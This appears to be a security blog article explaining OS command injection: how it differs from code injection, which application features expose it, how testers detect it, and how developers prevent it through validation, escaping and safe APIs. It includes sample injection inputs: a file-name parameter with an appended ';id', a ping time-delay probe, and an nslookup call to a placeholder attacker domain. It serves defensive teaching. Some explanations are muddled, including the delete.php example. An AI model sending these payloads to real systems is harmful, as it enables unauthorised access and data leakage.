You must have heard of âSQL injectionâ - the intrusion technique that has targeted multiple big websites over the past 2 decades. Itâs a famous type of âcode injectionâ. However, you have more reasons to worry, because attackers do not just attack through database queries or by cracking your code.Â
Another favorite attacking method of theirs is âCommand Injectionâ.
An approvingly viable means to manipulate a site or app alongside its inherited data, command (or shell) injection, is a highly potential threat. Why one should be bothered about it, what dangers it holds, and some preventive measures are the key pointers covered in the upcoming sections.
Accomplished by sending incidental and corrupted commands towards the host serverâs OS, this attack aspires to gain admin-like control of the targeted site or app and its associated elements. Depending upon the intensity, the OWASP command injection attack can influence other application components such as hosting infrastructure, trust between the client and the server, and overall application performance.
How it takes place:
ExamplesÂ
http ://127.0.0.1/delete.php?filename=inject_demo.txt;id
The above command will delete a file named âinject_demo.txtâ from your website/app and can be run by anyone.
As both aim to disintegrate the host server and implicate injecting manipulated elements, it is apparent to consider them alike. However, thatâs not 100% true.
Code injection interests exploited code introduction using an app and banks upon the ill-handling of non-trustful data inputs by the end-user. All the attacks, using this mode of action, happen due to the absence of (one of multiple essential) end-user data validation at any stage. The code introduction can be done locally or over the internet.
Speaking of the harms caused, injecting corrupted code can only hamper the targeted system/application.Â
For instance, if a threat actor introduces a corrupted PHP code, then the code will be highly driven by the host machineâs PHP functionalities and permissions. Its execution is simple and looks very much similar to Trojan horses.
On the contrary to this, command-injection deals with introducing exploited commands to the shell and other core components. In this method, the attacker doesnât use any outside code to take the targeted system into control or to hamper it.Â
Rather, already present default app functionalities are expanded to spot the vulnerabilities. Once figured out, this security or functionality hole is used to exploit the app.Â
This type of attack can also take place via URLs and remote servers.Â
The occurrence of this vulnerability is possible with the use of the below-mentioned ways:
There are various applications that allow clients to execute random commands. These apps are more prone to injection through commands as commands can be sent automatically to the host.
Applications permitting clients to upload any random file is problematic because attacks can make use of it to carry out command injection attacks. Itâs easy to introduce any malicious command using an arbitrary file.Â
Mostly, threat actors place such files in the webroot and execute the attack.
When server-side deserialization is completed without adequate user input verification, itâs easy to perform this attack.Â
It permits a website to create dynamic HTML responses, which is an opportunity for attackers. The presence of such HTML responses makes malicious command insertion on the server-side templates possible.Â
Applications featuring an ill-configured XML parser wonât be able to parse the user-controlled XML inputs properly and create a vulnerability space for the command injection. Taking the advantage, attackers can introduce an exploited command in the XML parser resulting in DDoS and SSRF attacks. Additionally, it will lead to data theft.Â
As command injection vulnerabilities remain hidden mostly, they can go unnoticed many times. Here are a few ways to allow testers/attackers to spot its presence.
For immediate command injection detection, one can trigger time delays. The ping command is most effective to make this happen, as this command is capable of explaining how many ICMP packets should be shared. The standard running time for this command is:
& ping -c 10 127.0.0.1 &
Activation of this command will compel the application to ping the network adapter for 10 seconds. It will cause the application to ping its loopback network adapter for 10 seconds.
Fuzzing is a widely used vulnerability detection technique that can work alone or in collaboration with other methods. Itâs usually implemented on the developer-side inputs.Â
Fuzzing of the inputs is a fully-automated process that will spot the presence of command injection vulnerabilities in an application. Testers need to fuzz the header of payloads to identify the command injection. Wfuzz, ffuf, and nuclie are some of the most commonly used tools for fuzzing.
As the prime condition for a command injection success is the payload compatibility with the OS command line syntax, itâs easy to find out the impacted OS. With OS fingerprinting, early command injection detection is possible and is useful for spotting the impacted payloads featuring proper syntax.Â
Using an injected command capable of triggering out-of-band network interaction via the OAST technique is a viable detection technique.Â
For instance, &nslookup kgji2ohoyw.web-attacker.com & payload utilizes nslookup command to initiate the DNS lookup for a particular domain. The attacker or tester can observe the stipulated DNS lookup and spot the presence of command injection.Â
Via an out-of-band channel, one can also filter the injected command output.Â
Redirecting the injected command output to the browser-retrieval file confined in the webroot will surface the presence of command injection.Â
Based upon the impacted application and data it inherits, the outcome of a command injection can be too detrimental. Hence, along with early detection, one must be aware of some of the most viable command injection prevention tactics:
Try to avoid âexecâ out to the OS as much as possible as it will keep the risks on the lower side. Ensure that most of the application work is done inside the application.Â
Make sure that the untrusted inputs are validated from beginning to end. Introducing non-validated inputs encourages vulnerability in the application. Along with the validation, one must also ensure that the inputs meet the applicationâs expectations.Â
One of the most widely acceptable validation processes is âwhitelist validationâ which involves accepting only application-compatible input and rejecting others. While performing validation, input components like character set, date bounds, minimum & maximum length, date & numeric bounds, Regular Expression Pattern match value, and many more.
There are many meta-characters that hold some importance in the OS command line. So, by neutralizing them, you can prevent their misuse by hackers. It should be done in Windows, Linux, and Unix OS.Â
Window users can make this happen by preceding every character with a â^â. To neutralize its special meaning, ( ) <>& * â | = ? ; [ ] ^ ~ ! . â % @ / \ : + , ` needs to be done.Â
The procedure is used for Linux and Unix OS. In this case, antecedent of the subsequent characters should be done with an â\â and meaning neutralization can be one with { } ( ) <>& * â | = ? ; [ ] $ â # ~ ! . â % / \ : + , `. In each case, meaning neutralization will be done to the command-line interpreter.Â
Implementing least privilege is not direct prevention. But, as it limits the permissions related to the account used for OS command execution, it keeps the risks and incurred harm on the lower side.Â
Command execution should be done with the help of secured APIs. Such APIs reduce the command injection risks as they permit the command execution first as a parameter and then as a command-line arguments array. This way, it warrants extensive command validation and takes the form of a valid program, free from risky elements.Â
Accountable for many types of havoc, command injection is a type of cyber-attacks influencing the host server and its operations. To keep your data, websites, and customers safe, you must know about it. Read the above article to understand it fully and learn how to prevent it.
Subscribe for the latest news